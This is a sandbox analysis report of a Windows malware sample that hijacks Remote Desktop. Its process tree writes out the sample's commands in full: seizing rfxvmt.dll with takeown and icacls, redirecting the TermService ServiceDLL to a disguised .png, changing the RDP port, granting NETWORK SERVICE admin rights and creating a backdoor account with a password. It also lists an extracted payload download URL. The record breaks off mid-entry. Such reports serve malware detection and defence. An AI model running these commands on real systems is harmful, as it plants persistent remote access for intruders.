Analysis
- max time kernel: 136s
- max time network: 129s
- platform: windows7_x64
- resource: win7v20201028
- submitted: 12-11-2020 14:16
Static task: static1
Behavioral task: behavioral1
- Sample: 689d8b997a921d6a96d82429d40677c13a7652abe4d045549f8c20d18f48ed98.exe
- Resource: win7v20201028
Behavioral task: behavioral2
- Sample: 689d8b997a921d6a96d82429d40677c13a7652abe4d045549f8c20d18f48ed98.exe
- Resource: win10v20201028
General
- Target: 689d8b997a921d6a96d82429d40677c13a7652abe4d045549f8c20d18f48ed98.exe
- Size: 3.4MB
- MD5: a8d7894060ed9e3a80de995fcbf81864
- SHA1: 8ed59a83db92328d05ec05af58f2b4e259be3af4
- SHA256: 689d8b997a921d6a96d82429d40677c13a7652abe4d045549f8c20d18f48ed98
- SHA512: 5e66992066cf9e0a698cf1271068a5c73aa0f8769b4b712317e528b8da83ca1780a730e72e19c4c20358b351e44692bfb6a957a0e782873063597baa3d97fa59
Malware Config
- Extracted: https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1 (the URL carried in the base64 -enc PowerShell command line in the process tree)
Signatures
- Grants admin privileges (1 TTPs)
  Uses net.exe to modify the user's privileges.
- Blacklisted process makes network request (10 IoCs)
  Processes (flow, PID, process):
  - flow 7: 948 powershell.exe
  - flow 9: 948 powershell.exe
  - flow 11: 948 powershell.exe
  - flow 12: 948 powershell.exe
  - flow 14: 948 powershell.exe
  - flow 16: 948 powershell.exe
  - flow 18: 948 powershell.exe
  - flow 20: 948 powershell.exe
  - flow 22: 948 powershell.exe
  - flow 24: 948 powershell.exe
- Modifies RDP port number used by Windows (1 TTPs)
- Possible privilege escalation attempt (8 IoCs)
  Processes (PID, process):
  - 1580 icacls.exe
  - 1644 icacls.exe
  - 1688 icacls.exe
  - 1060 icacls.exe
  - 1292 icacls.exe
  - 1420 takeown.exe
  - 432 icacls.exe
  - 1540 icacls.exe
- Sets DLL path for service in the registry (2 TTPs)
- YARA rule matches (resource, yara_rule):
  - \Windows\Branding\mediasrv.png: upx
  - \Windows\Branding\mediasvc.png: upx
- Deletes itself (1 IoCs)
  Processes (PID, process):
  - 1340 powershell.exe
- Loads dropped DLL (2 IoCs)
  Processes (PID, process):
  - 1616
  - 1616
- Modifies file permissions (1 TTPs, 8 IoCs)
  Processes (PID, process):
  - 1292 icacls.exe
  - 1420 takeown.exe
  - 432 icacls.exe
  - 1540 icacls.exe
  - 1580 icacls.exe
  - 1644 icacls.exe
  - 1688 icacls.exe
  - 1060 icacls.exe
- Drops file in System32 directory (1 IoCs)
  Processes (description, ioc, process):
  - File created: C:\Windows\system32\rfxvmt.dll (powershell.exe)
- Modifies service (2 TTPs, 2 IoCs)
  Processes (description, ioc, process):
  - Set value (str): \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" (reg.exe)
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\parameters (reg.exe)
- Drops file in Windows directory (41 IoCs)
  Processes (description, ioc, process):
  - File created: C:\Windows\branding\mediasrv.png (powershell.exe)
  - File opened for modification: C:\Windows\branding\wupsvc.jpg (powershell.exe)
  - File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e5d4789a-4fed-4f8d-8701-811a28cc3bbd (powershell.exe)
  - File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fe4df0f1-029a-4c6f-9d3c-09dbee396854 (powershell.exe)
  - File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Tar3C56.tmp (powershell.exe)
  - File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Tar400A.tmp (powershell.exe)
  - File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (powershell.exe)
  - File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\Temporary Internet Files (powershell.exe)
  - File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat (powershell.exe)
  - File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Tar3FB6.tmp (powershell.exe)
  - File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Cab4009.tmp (powershell.exe)
  - File created: C:\Windows\branding\mediasvc.png (powershell.exe)
  - File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex (powershell.exe)
  - File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Cab3C55.tmp (powershell.exe)
  - File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Tar3D03.tmp (powershell.exe)
  - File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Cab4049.tmp (powershell.exe)
  - File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_766c3dcd-b6b7-4cb4-8db5-0ebe1a1f3605 (powershell.exe)
  - File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4caa1386-ca6c-42fe-92ca-629b492ff562 (powershell.exe)
  - File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Cab3D62.tmp (powershell.exe)
  - File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Tar3D63.tmp (powershell.exe)
  - File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Tar404A.tmp (powershell.exe)
  - File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Cab3FB5.tmp (powershell.exe)
  - File created: C:\Windows\branding\wupsvc.jpg (powershell.exe)
  - File opened for modification: C:\Windows\branding\Basebrd (powershell.exe)
  - File opened for modification: C:\Windows\branding\mediasrv.png (powershell.exe)
  - File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6134aceb-9b00-473e-aab6-a055eb8726c2 (powershell.exe)
  - File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_35a41d01-beab-4c5b-9bd7-7d1e3ecc8cf3 (powershell.exe)
  - File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Cab3FF7.tmp (powershell.exe)
  - File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Tar3FF8.tmp (powershell.exe)
  - File opened for modification: C:\Windows\branding\mediasvc.png (powershell.exe)
  - File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_034df294-e482-4165-a67e-9e13fbfcf5e1 (powershell.exe)
  - File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_be019eb4-9622-4f25-9d10-05320a6ae6e6 (powershell.exe)
  - File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_33c9dd1a-3dd8-46d3-bd4f-e145ee5cf4ac (powershell.exe)
  - File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b491d7d6-b03d-4285-ad15-ac8a275d4061 (powershell.exe)
  - File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Cab3FC6.tmp (powershell.exe)
  - File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Tar3FC7.tmp (powershell.exe)
  - File opened for modification: C:\Windows\branding\ShellBrd (powershell.exe)
  - File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4CW1UWIJIWA8OVL2S0AG.temp (powershell.exe)
  - File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8dfd443d-9e65-4708-bac1-6b64ab18a284 (powershell.exe)
  - File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 (powershell.exe)
  - File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Cab3D02.tmp (powershell.exe)
- Modifies data under HKEY_USERS (60 IoCs)
  Processes (description, ioc, process):
  - Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA (powershell.exe)
  - Key created: \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople (powershell.exe)
  - Key created: \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed (powershell.exe)
  - Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" (powershell.exe)
  - Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" (powershell.exe)
  - Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople (powershell.exe)
  - Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad (powershell.exe)
  - Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ (WMIC.exe)
  - Key created: \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs (powershell.exe)
  - Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot (powershell.exe)
  - Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs (powershell.exe)
  - Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" (powershell.exe)
  - Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs (powershell.exe)
  - Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates (powershell.exe)
  - Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ (powershell.exe)
  - Key created: \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage (powershell.exe)
  - Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\My (powershell.exe)
  - Key created: \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs (powershell.exe)
  - Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections (powershell.exe)
  - Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1" (powershell.exe)
  - Set value (data): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (powershell.exe)
  - Set value (data): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (powershell.exe)
  - Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ (WMIC.exe)
  - Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed (powershell.exe)
  - Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust (powershell.exe)
  - Key created: \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\25\52C64B7E (powershell.exe)
  - Key created: \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache (powershell.exe)
  - Key created: \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs (powershell.exe)
  - Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root (powershell.exe)
  - Key created: \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs (powershell.exe)
  - Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs (powershell.exe)
  - Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs (powershell.exe)
  - Key created: \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs (powershell.exe)
  - Key created: \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings (powershell.exe)
  - Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" (powershell.exe)
  - Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings (powershell.exe)
  - Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs (powershell.exe)
  - Key created: \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs (powershell.exe)
  - Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates (powershell.exe)
  - Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs (powershell.exe)
  - Key created: \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs (powershell.exe)
  - Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" (powershell.exe)
  - Set value (data): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = f04c69780fb9d601 (powershell.exe)
  - Key created: \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA (powershell.exe)
  - Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs (powershell.exe)
  - Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates (powershell.exe)
  - Key created: \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates (powershell.exe)
  - Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates (powershell.exe)
  - Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs (powershell.exe)
  - Key created: \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates (powershell.exe)
  - Key created: \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust (powershell.exe)
  - Key created: \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates (powershell.exe)
  - Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates (powershell.exe)
  - Key created: \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates (powershell.exe)
  - Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs (powershell.exe)
  - Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs (powershell.exe)
  - Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs (powershell.exe)
  - Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates (powershell.exe)
  - Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs (powershell.exe)
  - Key created: \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs (powershell.exe)
- Modifies registry key (1 TTPs, 1 IoCs)
- Runs net.exe
- Script User-Agent (4 IoCs)
  Uses user-agent string associated with script host/environment.
  Processes (description, flow, ioc):
  - HTTP User-Agent header, flow 11: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  - HTTP User-Agent header, flow 12: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  - HTTP User-Agent header, flow 14: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  - HTTP User-Agent header, flow 16: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- Suspicious behavior: EnumeratesProcesses (7 IoCs)
  Processes (PID, process):
  - 1340 powershell.exe
  - 1340 powershell.exe
  - 1340 powershell.exe
  - 1340 powershell.exe
  - 1340 powershell.exe
  - 948 powershell.exe
  - 948 powershell.exe
- Suspicious behavior: LoadsDriver (5 IoCs)
  Processes (PID, process):
  - 468
  - 1616
  - 1616
  - 1616
  - 1616
- Suspicious use of AdjustPrivilegeToken (15 IoCs)
  Processes (description, PID, process):
  - Token: SeDebugPrivilege, 1340 powershell.exe
  - Token: SeRestorePrivilege, 1540 icacls.exe
  - Token: SeAssignPrimaryTokenPrivilege, 1580 WMIC.exe
  - Token: SeIncreaseQuotaPrivilege, 1580 WMIC.exe
  - Token: SeAuditPrivilege, 1580 WMIC.exe
  - Token: SeAssignPrimaryTokenPrivilege, 1580 WMIC.exe
  - Token: SeIncreaseQuotaPrivilege, 1580 WMIC.exe
  - Token: SeAuditPrivilege, 1580 WMIC.exe
  - Token: SeAssignPrimaryTokenPrivilege, 1688 WMIC.exe
  - Token: SeIncreaseQuotaPrivilege, 1688 WMIC.exe
  - Token: SeAuditPrivilege, 1688 WMIC.exe
  - Token: SeAssignPrimaryTokenPrivilege, 1688 WMIC.exe
  - Token: SeIncreaseQuotaPrivilege, 1688 WMIC.exe
  - Token: SeAuditPrivilege, 1688 WMIC.exe
  - Token: SeDebugPrivilege, 948 powershell.exe
- Suspicious use of WriteProcessMemory (127 IoCs)
  Processes (description, PID, process -> target process):
  - PID 308 wrote to memory of 1340: 689d8b997a921d6a96d82429d40677c13a7652abe4d045549f8c20d18f48ed98.exe -> powershell.exe
  - PID 308 wrote to memory of 1340: 689d8b997a921d6a96d82429d40677c13a7652abe4d045549f8c20d18f48ed98.exe -> powershell.exe
  - PID 308 wrote to memory of 1340: 689d8b997a921d6a96d82429d40677c13a7652abe4d045549f8c20d18f48ed98.exe -> powershell.exe
  - PID 308 wrote to memory of 1340: 689d8b997a921d6a96d82429d40677c13a7652abe4d045549f8c20d18f48ed98.exe -> powershell.exe
  - PID 1340 wrote to memory of 268: powershell.exe -> csc.exe
  - PID 1340 wrote to memory of 268: powershell.exe -> csc.exe
  - PID 1340 wrote to memory of 268: powershell.exe -> csc.exe
  - PID 268 wrote to memory of 1164: csc.exe -> cvtres.exe
  - PID 268 wrote to memory of 1164: csc.exe -> cvtres.exe
  - PID 268 wrote to memory of 1164: csc.exe -> cvtres.exe
  - PID 1340 wrote to memory of 1420: powershell.exe -> takeown.exe
  - PID 1340 wrote to memory of 1420: powershell.exe -> takeown.exe
  - PID 1340 wrote to memory of 1420: powershell.exe -> takeown.exe
  - PID 1340 wrote to memory of 432: powershell.exe -> icacls.exe
  - PID 1340 wrote to memory of 432: powershell.exe -> icacls.exe
  - PID 1340 wrote to memory of 432: powershell.exe -> icacls.exe
  - PID 1340 wrote to memory of 1540: powershell.exe -> icacls.exe
  - PID 1340 wrote to memory of 1540: powershell.exe -> icacls.exe
  - PID 1340 wrote to memory of 1540: powershell.exe -> icacls.exe
  - PID 1340 wrote to memory of 1580: powershell.exe -> icacls.exe
  - PID 1340 wrote to memory of 1580: powershell.exe -> icacls.exe
  - PID 1340 wrote to memory of 1580: powershell.exe -> icacls.exe
  - PID 1340 wrote to memory of 1644: powershell.exe -> icacls.exe
  - PID 1340 wrote to memory of 1644: powershell.exe -> icacls.exe
  - PID 1340 wrote to memory of 1644: powershell.exe -> icacls.exe
  - PID 1340 wrote to memory of 1688: powershell.exe -> icacls.exe
  - PID 1340 wrote to memory of 1688: powershell.exe -> icacls.exe
  - PID 1340 wrote to memory of 1688: powershell.exe -> icacls.exe
  - PID 1340 wrote to memory of 1060: powershell.exe -> icacls.exe
  - PID 1340 wrote to memory of 1060: powershell.exe -> icacls.exe
  - PID 1340 wrote to memory of 1060: powershell.exe -> icacls.exe
  - PID 1340 wrote to memory of 1292: powershell.exe -> icacls.exe
  - PID 1340 wrote to memory of 1292: powershell.exe -> icacls.exe
  - PID 1340 wrote to memory of 1292: powershell.exe -> icacls.exe
  - PID 1340 wrote to memory of 760: powershell.exe -> reg.exe
  - PID 1340 wrote to memory of 760: powershell.exe -> reg.exe
  - PID 1340 wrote to memory of 760: powershell.exe -> reg.exe
  - PID 1340 wrote to memory of 1068: powershell.exe -> reg.exe
  - PID 1340 wrote to memory of 1068: powershell.exe -> reg.exe
  - PID 1340 wrote to memory of 1068: powershell.exe -> reg.exe
  - PID 1340 wrote to memory of 1248: powershell.exe -> reg.exe
  - PID 1340 wrote to memory of 1248: powershell.exe -> reg.exe
  - PID 1340 wrote to memory of 1248: powershell.exe -> reg.exe
  - PID 1340 wrote to memory of 956: powershell.exe -> net.exe
  - PID 1340 wrote to memory of 956: powershell.exe -> net.exe
  - PID 1340 wrote to memory of 956: powershell.exe -> net.exe
  - PID 956 wrote to memory of 944: net.exe -> net1.exe
  - PID 956 wrote to memory of 944: net.exe -> net1.exe
  - PID 956 wrote to memory of 944: net.exe -> net1.exe
  - PID 1340 wrote to memory of 1656: powershell.exe -> cmd.exe
  - PID 1340 wrote to memory of 1656: powershell.exe -> cmd.exe
  - PID 1340 wrote to memory of 1656: powershell.exe -> cmd.exe
  - PID 1656 wrote to memory of 1080: cmd.exe -> cmd.exe
  - PID 1656 wrote to memory of 1080: cmd.exe -> cmd.exe
  - PID 1656 wrote to memory of 1080: cmd.exe -> cmd.exe
  - PID 1080 wrote to memory of 1648: cmd.exe -> net.exe
  - PID 1080 wrote to memory of 1648: cmd.exe -> net.exe
  - PID 1080 wrote to memory of 1648: cmd.exe -> net.exe
  - PID 1648 wrote to memory of 1936: net.exe -> net1.exe
  - PID 1648 wrote to memory of 1936: net.exe -> net1.exe
  - PID 1648 wrote to memory of 1936: net.exe -> net1.exe
  - PID 1340 wrote to memory of 1164: powershell.exe -> cmd.exe
  - PID 1340 wrote to memory of 1164: powershell.exe -> cmd.exe
  - PID 1340 wrote to memory of 1164: powershell.exe -> cmd.exe
Processes
(Depth is the process-tree nesting level; each entry gives the image path, the command line, and the signatures the sandbox attached to that process.)
- Depth 1: C:\Users\Admin\AppData\Local\Temp\689d8b997a921d6a96d82429d40677c13a7652abe4d045549f8c20d18f48ed98.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\689d8b997a921d6a96d82429d40677c13a7652abe4d045549f8c20d18f48ed98.exe"
  - Suspicious use of WriteProcessMemory
- Depth 2: \??\c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe
  Command line: -ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
  - Deletes itself
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
- Depth 3: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
  Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5agdcg2t\5agdcg2t.cmdline"
  - Suspicious use of WriteProcessMemory
- Depth 4: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
  Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAD7E.tmp" "c:\Users\Admin\AppData\Local\Temp\5agdcg2t\CSC977694CB725A4BBD99B4E7E5B7F754.TMP"
- Depth 3: C:\Windows\system32\takeown.exe
  Command line: "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
  - Possible privilege escalation attempt
  - Modifies file permissions
- Depth 3: C:\Windows\system32\icacls.exe
  Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
  - Possible privilege escalation attempt
  - Modifies file permissions
- Depth 3: C:\Windows\system32\icacls.exe
  Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
  - Possible privilege escalation attempt
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
- Depth 3: C:\Windows\system32\icacls.exe
  Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
  - Possible privilege escalation attempt
  - Modifies file permissions
- Depth 3: C:\Windows\system32\icacls.exe
  Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
  - Possible privilege escalation attempt
  - Modifies file permissions
- Depth 3: C:\Windows\system32\icacls.exe
  Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
  - Possible privilege escalation attempt
  - Modifies file permissions
- Depth 3: C:\Windows\system32\icacls.exe
  Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
  - Possible privilege escalation attempt
  - Modifies file permissions
- Depth 3: C:\Windows\system32\icacls.exe
  Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
  - Possible privilege escalation attempt
  - Modifies file permissions
- Depth 3: C:\Windows\system32\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
- Depth 3: C:\Windows\system32\reg.exe
  Command line: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
  - Modifies service
  - Modifies registry key
- Depth 3: C:\Windows\system32\reg.exe
  Command line: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
- Depth 3: C:\Windows\system32\net.exe
  Command line: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
  - Suspicious use of WriteProcessMemory
- Depth 4: C:\Windows\system32\net1.exe
  Command line: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
- Depth 3: C:\Windows\system32\cmd.exe
  Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
  - Suspicious use of WriteProcessMemory
- Depth 4: C:\Windows\system32\cmd.exe
  Command line: cmd /c net start rdpdr
  - Suspicious use of WriteProcessMemory
- Depth 5: C:\Windows\system32\net.exe
  Command line: net start rdpdr
  - Suspicious use of WriteProcessMemory
- Depth 6: C:\Windows\system32\net1.exe
  Command line: C:\Windows\system32\net1 start rdpdr
- Depth 3: C:\Windows\system32\cmd.exe
  Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
- Depth 4: C:\Windows\system32\cmd.exe
  Command line: cmd /c net start TermService
- Depth 5: C:\Windows\system32\net.exe
  Command line: net start TermService
- Depth 6: C:\Windows\system32\net1.exe
  Command line: C:\Windows\system32\net1 start TermService
- Depth 3: C:\Windows\system32\cmd.exe
  Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
- Depth 3: C:\Windows\system32\cmd.exe
  Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
- Depth 1: C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe user updwin Ghasar4f5 /del
- Depth 2: C:\Windows\system32\net.exe
  Command line: net.exe user updwin Ghasar4f5 /del
- Depth 3: C:\Windows\system32\net1.exe
  Command line: C:\Windows\system32\net1 user updwin Ghasar4f5 /del
- Depth 1: C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe user updwin dm9djaMi /add
- Depth 2: C:\Windows\system32\net.exe
  Command line: net.exe user updwin dm9djaMi /add
- Depth 3: C:\Windows\system32\net1.exe
  Command line: C:\Windows\system32\net1 user updwin dm9djaMi /add
- Depth 1: C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD
- Depth 2: C:\Windows\system32\net.exe
  Command line: net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD
- Depth 3: C:\Windows\system32\net1.exe
